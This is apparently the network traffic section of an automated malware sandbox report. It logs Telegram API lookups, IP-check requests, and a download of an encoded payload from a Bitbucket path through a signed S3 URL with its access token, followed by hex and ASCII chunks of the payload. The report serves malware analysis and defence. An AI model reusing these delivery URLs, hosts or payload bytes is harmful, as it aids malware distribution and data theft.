                                                                                                        Dec 18, 2024 16:30:48.211654902 CET1.1.1.1192.168.2.80x8181No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 16:31:02.126786947 CET1.1.1.1192.168.2.80xccfNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false

                                                                                                        HTTP Request Dependency Graph

                                                                                                        • bitbucket.org
                                                                                                        • bbuseruploads.s3.amazonaws.com
                                                                                                        • api.telegram.org
                                                                                                        • checkip.dyndns.org

                                                                                                        HTTP Packets

                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        0192.168.2.849707132.226.8.169806760C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Dec 18, 2024 16:30:40.799964905 CET151OUTGET / HTTP/1.1
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                        Host: checkip.dyndns.org
                                                                                                        Connection: Keep-Alive
                                                                                                        Dec 18, 2024 16:30:42.203200102 CET273INHTTP/1.1 200 OK
                                                                                                        Date: Wed, 18 Dec 2024 15:30:41 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 104
                                                                                                        Connection: keep-alive
                                                                                                        Cache-Control: no-cache
                                                                                                        Pragma: no-cache
                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        1192.168.2.849713132.226.8.169803428C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Dec 18, 2024 16:30:54.462153912 CET151OUTGET / HTTP/1.1
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                        Host: checkip.dyndns.org
                                                                                                        Connection: Keep-Alive
                                                                                                        Dec 18, 2024 16:30:55.905942917 CET273INHTTP/1.1 200 OK
                                                                                                        Date: Wed, 18 Dec 2024 15:30:55 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 104
                                                                                                        Connection: keep-alive
                                                                                                        Cache-Control: no-cache
                                                                                                        Pragma: no-cache
                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        2192.168.2.849715132.226.8.169807064C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Dec 18, 2024 16:31:01.517141104 CET151OUTGET / HTTP/1.1
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                        Host: checkip.dyndns.org
                                                                                                        Connection: Keep-Alive
                                                                                                        Dec 18, 2024 16:31:02.946461916 CET273INHTTP/1.1 200 OK
                                                                                                        Date: Wed, 18 Dec 2024 15:31:02 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 104
                                                                                                        Connection: keep-alive
                                                                                                        Cache-Control: no-cache
                                                                                                        Pragma: no-cache
                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                        HTTPS Proxied Packets

                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        0192.168.2.849705185.166.143.484434896C:\Users\Public\Libraries\spoolsv.COM
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 15:30:32 UTC187OUTGET /ntim1478/gpmaw/downloads/202_Cneehezxuzj HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept: */*
                                                                                                        User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                        Host: bitbucket.org
                                                                                                        2024-12-18 15:30:33 UTC5925INHTTP/1.1 302 Found
                                                                                                        Date: Wed, 18 Dec 2024 15:30:32 GMT
                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                        Content-Length: 0
                                                                                                        Server: AtlassianEdge
                                                                                                        Location: https://bbuseruploads.s3.amazonaws.com/e427e629-62a6-4ecd-bf22-56e4d6ea083f/downloads/3fdf6255-c09f-4309-a330-311e812ab273/202_Cneehezxuzj?response-content-disposition=attachment%3B%20filename%3D%22202_Cneehezxuzj%22&AWSAccessKeyId=ASIA6KOSE3BNHUQUF4A6&Signature=cFww4wpmqtopKHlnmXlm4GVTpQg%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEJj%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJGMEQCIEndov2P1y0Z9e0DlTVxAv6A14kmp9GBJjmAh%2FjmTMFwAiBjG2TfGOxIkvMGRVFDckh%2BAASexPpbLyJKYHMryKxSriqnAghhEAAaDDk4NDUyNTEwMTE0NiIMf%2Bh2cKia5Yx4TuvBKoQCEEzKKpluFmsQkjGCbSPYf%2BLJiFaVkBou%2B66q5kuWxCylJUxBLQOH3EPVfOOqBUsjv%2BplzMxEMKiVkX7udPXu7zIKdXWWG%2B%2BprQZWvy0TX23XQIYbgpnfJojx0RHba%2BldodnwwKFHrr3lIgLVesPQYtw%2BCu6ZsSzrD29UkfkzW8%2F1hoA2B9KHRvxC9iLESNK%2BeIGKhxzVjTXsaxwf%2BSOHufmSV7YsLhCS9yy56Xi7gDSRpgaqGyuCq1RWZTJumEq3IbG6r4YeWb%2BAI6F5GCPynlAkfItG6ShyZ1YbOdESvbkj%2Bg51ynTw5XoOaU%2Fbe4vVdWpFvhgzAs6zpE%2FVGK3eqCo%2FMJ4w6dSLuwY6ngEhZlKNLEhMPrSpaSiwOVqR5QNGIQ%2Fe2ipvll7jjw67tvUewMuEkhMTDcvqFrlpslPfjG4qG81rcgIZEGMXYjC0fmyX7 [TRUNCATED]
                                                                                                        Expires: Wed, 18 Dec 2024 15:30:32 GMT
                                                                                                        Cache-Control: max-age=0, no-cache, no-store, must-revalidate, private
                                                                                                        X-Used-Mesh: False
                                                                                                        Vary: Accept-Language, Origin
                                                                                                        Content-Language: en
                                                                                                        X-View-Name: bitbucket.apps.downloads.views.download_file
                                                                                                        X-Dc-Location: Micros-3
                                                                                                        X-Served-By: 57fb0654857d
                                                                                                        X-Version: 020364176b66
                                                                                                        X-Static-Version: 020364176b66
                                                                                                        X-Request-Count: 1070
                                                                                                        X-Render-Time: 0.055730342864990234
                                                                                                        X-B3-Traceid: 5d38a543df8d42b8ae541d57a013e8b8
                                                                                                        X-B3-Spanid: 6e0da9d9a456bddd
                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                        Content-Security-Policy: script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net https://remote-app-switcher.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/; object-src 'none'; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net atlassianblog.wpengine.com id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ w [TRUNCATED]
                                                                                                        X-Usage-Quota-Remaining: 999156.068
                                                                                                        X-Usage-Request-Cost: 860.40
                                                                                                        X-Usage-User-Time: 0.021483
                                                                                                        X-Usage-System-Time: 0.004329
                                                                                                        X-Usage-Input-Ops: 0
                                                                                                        X-Usage-Output-Ops: 0
                                                                                                        Age: 0
                                                                                                        X-Cache: MISS
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        X-Xss-Protection: 1; mode=block
                                                                                                        Atl-Traceid: 5d38a543df8d42b8ae541d57a013e8b8
                                                                                                        Atl-Request-Id: 5d38a543-df8d-42b8-ae54-1d57a013e8b8
                                                                                                        Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                                                                        Report-To: {"endpoints": [{"url": "https://dz8aopenkvv6s.cloudfront.net"}], "group": "endpoint-1", "include_subdomains": true, "max_age": 600}
                                                                                                        Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
                                                                                                        Server-Timing: atl-edge;dur=167,atl-edge-internal;dur=3,atl-edge-upstream;dur=165,atl-edge-pop;desc="aws-eu-central-1"
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        1192.168.2.84970654.231.224.1854434896C:\Users\Public\Libraries\spoolsv.COM
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 15:30:34 UTC1291OUTGET /e427e629-62a6-4ecd-bf22-56e4d6ea083f/downloads/3fdf6255-c09f-4309-a330-311e812ab273/202_Cneehezxuzj?response-content-disposition=attachment%3B%20filename%3D%22202_Cneehezxuzj%22&AWSAccessKeyId=ASIA6KOSE3BNHUQUF4A6&Signature=cFww4wpmqtopKHlnmXlm4GVTpQg%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEJj%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJGMEQCIEndov2P1y0Z9e0DlTVxAv6A14kmp9GBJjmAh%2FjmTMFwAiBjG2TfGOxIkvMGRVFDckh%2BAASexPpbLyJKYHMryKxSriqnAghhEAAaDDk4NDUyNTEwMTE0NiIMf%2Bh2cKia5Yx4TuvBKoQCEEzKKpluFmsQkjGCbSPYf%2BLJiFaVkBou%2B66q5kuWxCylJUxBLQOH3EPVfOOqBUsjv%2BplzMxEMKiVkX7udPXu7zIKdXWWG%2B%2BprQZWvy0TX23XQIYbgpnfJojx0RHba%2BldodnwwKFHrr3lIgLVesPQYtw%2BCu6ZsSzrD29UkfkzW8%2F1hoA2B9KHRvxC9iLESNK%2BeIGKhxzVjTXsaxwf%2BSOHufmSV7YsLhCS9yy56Xi7gDSRpgaqGyuCq1RWZTJumEq3IbG6r4YeWb%2BAI6F5GCPynlAkfItG6ShyZ1YbOdESvbkj%2Bg51ynTw5XoOaU%2Fbe4vVdWpFvhgzAs6zpE%2FVGK3eqCo%2FMJ4w6dSLuwY6ngEhZlKNLEhMPrSpaSiwOVqR5QNGIQ%2Fe2ipvll7jjw67tvUewMuEkhMTDcvqFrlpslPfjG4qG81rcgIZEGMXYjC0fmyX7PQssGw0Vl9DOmiTKooxU4XM8Nsbc08SmOisr1aKKCWOS [TRUNCATED]
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept: */*
                                                                                                        User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                        Host: bbuseruploads.s3.amazonaws.com
                                                                                                        2024-12-18 15:30:35 UTC544INHTTP/1.1 200 OK
                                                                                                        x-amz-id-2: CwGZgzHC2X+b9SQMp/NOlLjHzrTs+kJgQnVG2vBBta7JVWN8N0CCGhdzUsr9iLtRFdSQgKA+lEw=
                                                                                                        x-amz-request-id: DPBEZKKMMF5JDYRF
                                                                                                        Date: Wed, 18 Dec 2024 15:30:36 GMT
                                                                                                        Last-Modified: Tue, 10 Dec 2024 22:09:20 GMT
                                                                                                        ETag: "26779352338d9dc792b7823fbf8d3268"
                                                                                                        x-amz-server-side-encryption: AES256
                                                                                                        x-amz-version-id: IA20jz0GkMTujfnoGO26P_HUbrxCsGFq
                                                                                                        Content-Disposition: attachment; filename="202_Cneehezxuzj"
                                                                                                        Accept-Ranges: bytes
                                                                                                        Content-Type: application/octet-stream
                                                                                                        Content-Length: 777592
                                                                                                        Server: AmazonS3
                                                                                                        Connection: close
                                                                                                        2024-12-18 15:30:35 UTC16384INData Raw: 68 34 2b 47 4f 67 53 49 6b 69 7a 30 43 50 45 44 39 67 50 2f 42 2f 33 32 42 76 44 39 2f 2f 66 2b 43 4f 2f 34 38 41 50 36 37 77 50 31 41 76 6a 7a 39 66 34 42 2b 66 6b 49 38 76 66 37 38 76 2f 77 41 2f 62 32 41 66 66 7a 42 76 6e 2b 2b 2f 48 2b 2f 41 67 42 38 50 54 33 2f 77 45 49 38 2f 55 42 42 50 58 7a 2f 66 72 32 41 51 49 42 42 66 37 37 37 77 45 42 41 66 48 30 2f 77 55 44 41 2f 49 41 41 41 50 2f 2b 76 75 48 6a 34 59 36 42 49 69 53 4c 43 2f 38 38 2f 50 32 38 77 67 47 41 77 6a 34 68 34 2b 47 4f 67 53 49 6b 69 7a 49 78 35 32 4c 6b 4e 6a 54 7a 72 2f 43 78 5a 36 2b 30 37 37 61 31 4d 36 6d 6c 6f 75 2f 77 39 72 48 31 74 65 6a 78 74 54 59 77 38 50 48 70 49 2b 54 78 39 50 48 31 63 4c 56 72 63 53 2f 7a 63 50 61 32 70 32 49 6b 74 48 52 78 38 6a 42 76 71 33 52 76 38 7a
                                                                                                        Data Ascii: h4+GOgSIkiz0CPED9gP/B/32BvD9//f+CO/48AP67wP1Avjz9f4B+fkI8vf78v/wA/b2AffzBvn++/H+/AgB8PT3/wEI8/UBBPXz/fr2AQIBBf777wEBAfH0/wUDA/IAAAP/+vuHj4Y6BIiSLC/88/P28wgGAwj4h4+GOgSIkizIx52LkNjTzr/CxZ6+077a1M6mlou/w9rH1tejxtTYw8PHpI+Tx9PH1cLVrcS/zcPa2p2IktHRx8jBvq3Rv8z
                                                                                                        2024-12-18 15:30:35 UTC480INData Raw: 55 49 31 31 51 71 6f 59 53 68 44 56 72 77 67 47 59 57 48 78 41 4c 44 68 61 37 53 58 7a 31 68 4a 6c 61 78 71 74 51 7a 33 38 30 6c 54 61 35 31 2b 50 45 2f 6a 64 53 4e 52 54 4d 38 4c 78 46 53 6e 4a 4a 6f 33 73 36 59 33 39 46 59 38 76 2f 46 32 37 73 35 44 4d 6e 68 76 48 5a 6e 31 62 32 38 4e 74 76 61 47 49 46 70 34 75 66 61 43 58 77 63 76 72 65 57 53 78 64 64 59 6a 31 66 30 35 59 39 6a 61 54 62 63 39 36 4b 57 53 4b 77 55 39 4b 70 34 73 47 57 78 59 37 4b 74 2b 7a 45 30 51 6e 32 5a 49 35 6c 41 32 2f 66 42 32 58 69 35 32 6f 61 73 2f 79 59 31 69 2b 61 4a 6e 32 57 2b 67 2f 2f 4e 62 68 63 67 6d 57 4f 43 75 6e 45 4a 6b 6e 43 43 6a 30 45 55 46 43 64 6b 42 75 75 6a 67 7a 39 6f 44 66 32 4b 44 56 77 55 39 57 76 5a 66 6c 42 67 65 2f 6a 39 5a 62 4b 67 42 58 45 2f 47 52 51
                                                                                                        Data Ascii: UI11QqoYShDVrwgGYWHxALDha7SXz1hJlaxqtQz380lTa51+PE/jdSNRTM8LxFSnJJo3s6Y39FY8v/F27s5DMnhvHZn1b28NtvaGIFp4ufaCXwcvreWSxddYj1f05Y9jaTbc96KWSKwU9Kp4sGWxY7Kt+zE0Qn2ZI5lA2/fB2Xi52oas/yY1i+aJn2W+g//NbhcgmWOCunEJknCCj0EUFCdkBuujgz9oDf2KDVwU9WvZflBge/j9ZbKgBXE/GRQ
                                                                                                        2024-12-18 15:30:35 UTC16384INData Raw: 45 6d 4f 68 45 65 36 49 46 77 66 73 78 56 45 57 35 64 6d 4d 74 6e 6e 79 50 35 53 2f 53 44 74 5a 36 79 6c 69 52 4f 7a 59 39 70 47 63 4b 75 56 59 31 58 42 35 61 54 69 58 33 71 36 67 71 34 36 52 4e 53 6e 74 55 42 51 6d 70 73 72 51 59 50 64 46 67 42 33 72 59 7a 59 77 6a 39 55 37 72 59 2b 38 44 48 46 61 45 2b 77 58 4e 59 41 61 52 6e 68 6e 59 49 36 47 69 55 42 6d 66 35 43 4b 6b 46 50 77 7a 54 49 59 41 6a 57 46 54 76 77 4b 58 31 38 69 7a 61 2b 33 43 71 4d 2b 64 30 58 32 4a 35 62 76 61 56 73 54 7a 5a 4f 38 6f 35 49 70 55 50 32 43 50 6e 7a 36 55 2b 4f 49 33 52 4f 6d 55 43 6f 30 6f 54 56 37 53 44 6e 69 4a 61 71 4e 31 73 56 61 49 38 2f 63 34 6d 67 79 77 57 73 48 59 34 54 50 32 6d 54 6e 78 53 67 44 72 79 77 73 34 6c 38 73 4c 78 6e 5a 32 38 30 2b 2b 38 2f 42 5a 76 57
                                                                                                        Data Ascii: EmOhEe6IFwfsxVEW5dmMtnnyP5S/SDtZ6yliROzY9pGcKuVY1XB5aTiX3q6gq46RNSntUBQmpsrQYPdFgB3rYzYwj9U7rY+8DHFaE+wXNYAaRnhnYI6GiUBmf5CKkFPwzTIYAjWFTvwKX18iza+3CqM+d0X2J5bvaVsTzZO8o5IpUP2CPnz6U+OI3ROmUCo0oTV7SDniJaqN1sVaI8/c4mgywWsHY4TP2mTnxSgDryws4l8sLxnZ280++8/BZvW
                                                                                                        2024-12-18 15:30:35 UTC1024INData Raw: 48 39 47 4b 6b 78 7a 78 35 49 43 64 47 55 78 37 68 35 31 39 46 66 78 58 63 42 46 32 37 2b 76 70 61 6c 47 31 67 4e 49 7a 4f 39 72 64 64 6a 37 36 4b 6b 34 6a 4f 33 67 55 6a 33 53 4b 66 49 69 54 55 66 68 54 49 6c 63 2b 47 4b 74 59 72 48 42 4c 42 70 4c 67 71 67 72 48 75 6a 59 50 7a 37 37 4e 49 42 76 50 56 4d 59 67 37 6f 77 77 59 46 6e 77 68 64 45 45 6c 4f 74 2f 68 76 4f 79 64 44 4d 57 30 31 74 2b 41 39 52 30 45 61 4b 77 54 72 4e 43 72 64 6c 64 77 5a 2b 59 53 2f 2b 61 76 64 6d 46 7a 72 43 38 57 4d 61 71 67 31 73 32 51 79 74 37 4d 31 47 6c 6a 34 53 61 6d 4d 65 55 78 63 5a 47 39 31 6c 66 2f 58 61 70 36 4f 48 68 42 75 50 68 77 47 47 73 47 64 7a 4c 51 50 6e 6c 69 57 31 41 37 78 6c 73 54 4b 78 4c 58 4e 64 49 6e 6e 57 56 38 31 49 51 57 6e 70 42 74 74 58 33 79 43 31
                                                                                                        Data Ascii: H9GKkxzx5ICdGUx7h519FfxXcBF27+vpalG1gNIzO9rddj76Kk4jO3gUj3SKfIiTUfhTIlc+GKtYrHBLBpLgqgrHujYPz77NIBvPVMYg7owwYFnwhdEElOt/hvOydDMW01t+A9R0EaKwTrNCrdldwZ+YS/+avdmFzrC8WMaqg1s2Qyt7M1Glj4SamMeUxcZG91lf/Xap6OHhBuPhwGGsGdzLQPnliW1A7xlsTKxLXNdInnWV81IQWnpBttX3yC1
                                                                                                        2024-12-18 15:30:35 UTC16384INData Raw: 63 2f 52 59 64 6f 6d 35 4d 77 77 5a 6b 76 51 2b 76 47 53 36 49 48 53 61 47 6e 39 4f 6a 68 67 45 73 78 4e 59 61 73 6b 75 51 76 33 52 38 47 6b 75 76 37 47 37 7a 79 72 38 2f 46 64 30 2f 34 70 44 6d 58 68 4a 64 6c 42 6b 2f 68 6b 51 49 71 30 73 37 70 78 4b 79 68 41 71 68 67 6c 2b 46 78 51 63 57 42 33 38 61 6e 43 63 68 77 6a 50 45 71 6f 66 38 6f 7a 33 6e 63 57 6d 2b 68 6f 75 75 37 63 61 6f 4b 38 6d 42 59 72 4a 6b 6e 71 52 75 7a 31 55 69 77 43 35 54 4d 39 76 2b 4b 76 59 6a 54 75 69 61 77 2b 45 51 78 47 4f 73 50 54 47 33 49 58 5a 31 74 64 35 49 46 42 50 4e 33 6a 49 57 35 4f 34 74 35 46 53 45 48 68 39 58 78 75 72 59 7a 75 79 31 74 6d 2b 55 4f 44 6d 4a 41 63 4a 79 44 67 6d 4b 70 36 4c 46 36 73 55 44 50 5a 35 55 71 75 55 75 43 77 48 45 2f 30 30 35 72 6f 68 2b 44 49
                                                                                                        Data Ascii: c/RYdom5MwwZkvQ+vGS6IHSaGn9OjhgEsxNYaskuQv3R8Gkuv7G7zyr8/Fd0/4pDmXhJdlBk/hkQIq0s7pxKyhAqhgl+FxQcWB38anCchwjPEqof8oz3ncWm+houu7caoK8mBYrJknqRuz1UiwC5TM9v+KvYjTuiaw+EQxGOsPTG3IXZ1td5IFBPN3jIW5O4t5FSEHh9XxurYzuy1tm+UODmJAcJyDgmKp6LF6sUDPZ5UquUuCwHE/005roh+DI
                                                                                                        2024-12-18 15:30:35 UTC1024INData Raw: 62 36 53 70 4f 2f 51 33 63 79 57 71 4a 68 32 38 6e 33 6b 32 47 48 48 4f 51 32 6e 4f 55 38 47 7a 63 57 37 31 77 69 6d 46 33 77 70 2f 4b 6d 59 72 58 6f 63 56 54 72 43 50 2f 45 73 36 66 2f 2b 30 71 43 43 77 68 41 75 56 6b 54 59 71 34 43 4b 52 55 46 47 6f 37 53 39 4e 43 76 46 51 79 63 43 67 46 63 55 4a 2b 51 76 62 74 31 62 54 73 45 58 68 32 7a 71 7a 6b 4d 31 64 38 42 39 57 76 41 37 4f 34 76 4f 64 79 33 55 74 6c 62 75 62 61 39 52 77 57 37 56 41 6d 4d 46 47 77 4f 56 59 73 6d 66 70 5a 73 4b 45 52 58 63 31 6e 34 53 54 4d 68 4a 37 48 44 41 4a 70 32 6d 6a 58 63 59 78 66 39 58 35 33 53 6c 59 6e 36 38 4a 64 2b 4a 72 53 52 6a 61 30 49 44 5a 39 67 4d 42 4b 31 6b 73 4a 4f 4e 31 6b 4c 32 4e 4f 6f 4d 2b 30 55 59 45 71 6a 51 69 54 4e 67 6f 39 38 45 45 47 6d 71 2f 42 42 65
                                                                                                        Data Ascii: b6SpO/Q3cyWqJh28n3k2GHHOQ2nOU8GzcW71wimF3wp/KmYrXocVTrCP/Es6f/+0qCCwhAuVkTYq4CKRUFGo7S9NCvFQycCgFcUJ+Qvbt1bTsEXh2zqzkM1d8B9WvA7O4vOdy3Utlbuba9RwW7VAmMFGwOVYsmfpZsKERXc1n4STMhJ7HDAJp2mjXcYxf9X53SlYn68Jd+JrSRja0IDZ9gMBK1ksJON1kL2NOoM+0UYEqjQiTNgo98EEGmq/BBe
                                                                                                        2024-12-18 15:30:35 UTC1749INData Raw: 41 4c 7a 49 42 33 70 41 69 6d 6e 4d 5a 65 30 6c 52 4d 58 57 4a 2f 75 64 69 39 6e 6a 63 65 52 6a 30 63 35 4a 68 43 66 59 46 68 4f 5a 33 64 78 38 72 2f 76 42 6a 6f 2b 77 4c 48 6d 76 2f 4a 73 64 77 74 2b 72 41 34 68 35 7a 54 57 35 38 62 51 48 51 66 4f 47 59 62 37 36 57 2f 53 55 56 76 43 76 57 33 66 45 64 51 48 4d 2f 6f 66 59 79 31 6e 48 4a 6e 68 4c 4d 75 63 69 49 4b 58 6b 51 37 61 57 2b 48 42 4d 6c 49 31 57 51 68 71 61 6b 32 55 64 78 67 49 56 62 75 59 71 6e 5a 2b 4e 57 57 30 38 4c 6b 2f 72 44 36 39 6a 61 58 71 65 50 76 38 30 6a 36 2f 78 47 79 55 76 34 6c 45 45 35 53 55 6e 4d 56 71 74 71 73 45 53 71 64 70 57 4c 54 68 4c 77 35 79 46 6e 42 59 73 34 65 58 69 77 32 44 56 71 73 4d 6f 75 59 58 62 42 59 69 4a 68 67 76 2f 59 34 63 34 61 59 33 57 71 61 45 37 56 6c 6b
                                                                                                        Data Ascii: ALzIB3pAimnMZe0lRMXWJ/udi9njceRj0c5JhCfYFhOZ3dx8r/vBjo+wLHmv/Jsdwt+rA4h5zTW58bQHQfOGYb76W/SUVvCvW3fEdQHM/ofYy1nHJnhLMuciIKXkQ7aW+HBMlI1WQhqak2UdxgIVbuYqnZ+NWW08Lk/rD69jaXqePv80j6/xGyUv4lEE5SUnMVqtqsESqdpWLThLw5yFnBYs4eXiw2DVqsMouYXbBYiJhgv/Y4c4aY3WqaE7Vlk
                                                                                                        2024-12-18 15:30:35 UTC9000INData Raw: 54 71 73 61 4d 39 43 37 4c 58 39 6c 57 62 77 45 38 70 43 4d 38 4f 48 43 57 55 59 49 6e 43 69 37 34 48 32 67 55 44 65 6b 74 6a 4f 4d 65 7a 54 6e 58 71 78 76 57 37 4f 32 5a 68 34 53 72 6c 46 63 6f 53 75 77 56 4e 58 6b 61 56 79 6c 47 4b 38 73 48 6b 30 4a 43 72 47 79 62 57 59 49 4b 73 68 30 79 47 66 61 34 58 7a 43 38 72 7a 65 6a 53 73 31 6c 55 67 38 54 6d 62 70 50 5a 2b 77 55 74 2b 62 4b 78 2f 66 6c 46 79 78 42 48 55 75 46 69 75 44 58 73 6c 4d 67 51 74 35 4b 2b 51 48 46 2b 34 59 70 45 59 55 67 4f 31 4f 57 2f 67 6e 6c 45 2b 61 38 6a 31 6a 50 65 49 77 50 57 52 38 55 70 2f 7a 58 62 79 59 65 52 50 65 77 36 79 64 51 31 6a 68 50 69 6f 74 4a 32 6b 46 42 54 48 37 5a 39 42 2b 4e 31 42 61 37 2f 6f 6b 33 2f 4a 4d 71 70 6e 6f 62 79 2b 31 76 37 43 53 43 66 4c 73 77 32 61
                                                                                                        Data Ascii: TqsaM9C7LX9lWbwE8pCM8OHCWUYInCi74H2gUDektjOMezTnXqxvW7O2Zh4SrlFcoSuwVNXkaVylGK8sHk0JCrGybWYIKsh0yGfa4XzC8rzejSs1lUg8TmbpPZ+wUt+bKx/flFyxBHUuFiuDXslMgQt5K+QHF+4YpEYUgO1OW/gnlE+a8j1jPeIwPWR8Up/zXbyYeRPew6ydQ1jhPiotJ2kFBTH7Z9B+N1Ba7/ok3/JMqpnoby+1v7CSCfLsw2a
                                                                                                        2024-12-18 15:30:35 UTC16384INData Raw: 4c 37 32 76 56 71 61 68 41 6f 35 44 75 64 79 70 32 51 4e 31 35 77 6e 75 6f 30 2f 45 56 6d 4a 7a 6a 50 64 57 36 2b 63 69 2b 68 38 6e 5a 2b 33 4a 74 75 55 45 66 4b 4b 2b 7a 6b 37 55 54 49 4e 6d 32 33 53 54 48 35 7a 69 54 4f 70 4f 32 35 6b 6f 38 49 4c 4e 76 57 52 62 6b 6f 54 54 34 6d 35 6b 34 5a 43 4a 4d 71 61 41 56 48 6a 7a 63 4e 59 4b 53 68 57 55 57 6e 5a 41 31 36 33 66 67 49 54 6a 4b 70 67 79 43 6d 54 38 66 50 42 41 59 68 31 66 6a 5a 4b 76 4e 79 4c 69 44 4d 65 43 53 4f 48 37 72 30 62 78 4c 2f 4a 75 2f 57 63 31 37 46 36 53 6c 49 77 65 4a 68 46 31 79 48 4e 34 74 54 56 73 69 6d 55 55 48 53 42 41 77 41 44 61 6c 2b 6f 44 71 56 65 63 35 36 44 4f 33 35 70 79 6c 4a 73 6d 69 59 30 72 61 37 33 44 41 61 49 6c 41 6c 65 31 71 66 76 4b 69 4e 31 6c 77 7a 41 53 68 41 48
                                                                                                        Data Ascii: L72vVqahAo5Dudyp2QN15wnuo0/EVmJzjPdW6+ci+h8nZ+3JtuUEfKK+zk7UTINm23STH5ziTOpO25ko8ILNvWRbkoTT4m5k4ZCJMqaAVHjzcNYKShWUWnZA163fgITjKpgyCmT8fPBAYh1fjZKvNyLiDMeCSOH7r0bxL/Ju/Wc17F6SlIweJhF1yHN4tTVsimUUHSBAwADal+oDqVec56DO35pylJsmiY0ra73DAaIlAle1qfvKiN1lwzAShAH
